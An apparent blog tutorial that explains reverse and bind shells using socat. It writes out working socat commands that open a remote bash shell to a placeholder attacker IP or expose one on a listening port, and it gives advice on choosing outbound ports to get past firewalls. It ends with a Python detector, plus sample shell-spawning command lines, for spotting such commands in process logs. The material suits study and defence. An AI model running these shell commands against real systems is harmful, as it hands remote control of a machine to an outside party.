Reverse Shell vs Bind Shell ft. Socat

Sundaram G

Analogy

Imagine two spies trying to communicate. One spy (attacker) waits at a safe house (port). The other spy (target) reaches out to initiate a secret chat - that’s a reverse shell. But if the safe house is locked and inaccessible, the first spy might knock on the other spy’s door instead - that’s a bind shell.

Now let’s understand how this works using Socat, the Swiss Army knife of networking tools.


What is Socat?

Socat (SOcket CAT) is a powerful command-line utility used to establish bidirectional data transfers between two data channels. Think of it as Netcat's smarter cousin. It can create encrypted connections, handle TTYs better, and forward between many protocols (TCP, UDP, UNIX sockets, etc.).


Netcat vs Socat

| Tool | Netcat | Socat |
| --- | --- | --- |
| Purpose | Simple TCP/UDP data transfer | Advanced data relay between endpoints |
| Protocol Support | TCP, UDP | TCP, UDP, SSL, UNIX sockets, more |
| Encryption | Not supported | SSL/TLS supported |
| Flexibility | Basic one-liners | Highly customizable setups |
| Ease of Use | Beginner-friendly | Steeper learning curve |
| Best For | Quick tests, basic reverse shells | Tunneling, relays, secure connections |

Reverse Shell with Socat

Target Command (sends shell to attacker):

socat EXEC:"bash -li",pty,stderr,setsid,sigint,sane TCP:<attacker-ip>:<port>

What this does:

  • EXEC:"bash -li": Launches an interactive login bash shell.

  • pty: Allocates a pseudo-terminal, making the shell behave properly.

  • stderr,setsid,sigint,sane: Ensures proper signal handling and clean I/O.

  • TCP:<attacker-ip>:<port>: Connects to the attacker’s IP and port.

Attacker Command (listen and forward to terminal):

socat TCP-L:<port> STDIO

Or better, for a real terminal interface:

socat TCP-L:<port> FILE:`tty`,raw,echo=0

Let’s break down the above command:

TCP-L:4444

  • This says: “Listen on TCP port 4444 (for example)”

  • When someone connects, receive data from them

  • This is your input stream

FILE:/dev/pts/X,raw,echo=0 (i.e., FILE:`tty`)

  • This is a file that represents your terminal (your screen + keyboard)

  • This is your output stream

  • Anything received over TCP will be written into this file (i.e., your terminal)

  • Anything you type goes into this file, and socat sends that to the TCP connection

This is the redirection:

  • Data from the TCP socket ←→ your terminal

  • socat copies data in both directions

Full I/O Redirection Explained - Flow:

  • TCP-L:4444 ← input from reverse shell

  • FILE:`tty` → sends that input into your terminal screen

  • Your keystrokes (in that terminal) go into /dev/pts/X and get sent back to the reverse shell via the TCP socket

Bind Shell with Socat

Target Command (starts a listener with shell):

socat TCP-L:<port>,reuseaddr,fork EXEC:"bash -li",pty,stderr,setsid,sigint,sane

  • TCP-L:<port>: Starts a listener on the target's machine.

  • reuseaddr,fork: Allows reuse of the port and handles multiple connections.

  • EXEC:"bash -li": Same — starts a bash shell.

  • pty,setsid: Ensures TTY allocation and session control.

Attacker Command (connects to target):

socat STDIO TCP:<target-ip>:<port>

Choosing the Right Port

  • Reverse Shell: Choose commonly allowed outbound ports like 443, 80, or 53 because most firewalls allow outgoing traffic on these.

  • Bind Shell: Choose ports less likely to be firewalled on the inbound side, but this is trickier. If a firewall blocks incoming traffic to unknown ports, bind shells won’t work well.

Reverse shells are more firewall-friendly in real-world scenarios.


TL;DR

| Feature | Reverse Shell (Socat) | Bind Shell (Socat) |
| --- | --- | --- |
| Initiated by | Target | Attacker |
| Firewall Bypass | Easier (uses outbound connection) | Harder (needs open inbound port on target) |
| Stability | Very stable with TTY, signals, etc. | Stable with fork, pty, setsid options |
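
From the defender's side, both target commands above have a recognisable shape in process-execution logs: a socat address that spawns a shell, paired with a TCP connect address (reverse) or a TCP listen address (bind). The Python below is an added example, not code from the original post. It also covers the SYSTEM, long-form TCP-LISTEN and OPENSSL address keywords beyond the two commands shown, and the `classify` function, keyword sets and sample lines (documentation IP ranges) are constructed for illustration.

```python
import shlex

# socat address keywords (matched case-insensitively) for the command shapes above.
SPAWN = {"EXEC", "SYSTEM"}
LISTEN = {"TCP-L", "TCP-LISTEN", "TCP4-LISTEN", "TCP6-LISTEN", "OPENSSL-LISTEN", "SSL-L"}
CONNECT = {"TCP", "TCP4", "TCP6", "TCP-CONNECT", "OPENSSL", "SSL"}
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}


def classify(cmdline):
    """Label one process command line: 'reverse-shell', 'bind-shell' or None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quote, e.g. a truncated log record
        argv = cmdline.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "socat":
        return None
    spawns_shell = listens = connects = False
    for arg in argv[1:]:
        keyword, _, params = arg.partition(":")
        keyword = keyword.upper()
        if keyword in SPAWN:
            # First comma-separated field is the program line; the rest are options.
            words = params.split(",")[0].split()
            name = words[0].strip("\"'").rsplit("/", 1)[-1] if words else ""
            spawns_shell |= name in SHELLS
        listens |= keyword in LISTEN
        connects |= keyword in CONNECT
    if spawns_shell and listens:
        return "bind-shell"
    if spawns_shell and connects:
        return "reverse-shell"
    return None


# Constructed sample command lines, as they would appear in process-execution logs.
SAMPLES = [
    'socat EXEC:"bash -li",pty,stderr,setsid,sigint,sane TCP:192.0.2.10:443',
    'socat TCP-L:4444,reuseaddr,fork EXEC:"bash -li",pty,stderr,setsid,sigint,sane',
    "socat TCP-L:4444 FILE:/dev/pts/3,raw,echo=0",  # plain listener, no shell spawned
    "/usr/bin/socat TCP-LISTEN:8080,fork,reuseaddr TCP:198.51.100.7:80",  # relay
    "socat -d -d tcp-listen:9001 system:/bin/sh",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{classify(line) or 'ok':14} {line}")
```

Plain relays and listeners are left unflagged because neither address spawns a shell; matching on the process name alone would flag every legitimate socat tunnel.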

Serious Note: Why did the hacker break up with Netcat?
Because Socat had better communication skills and actually listened on both ends. 😎
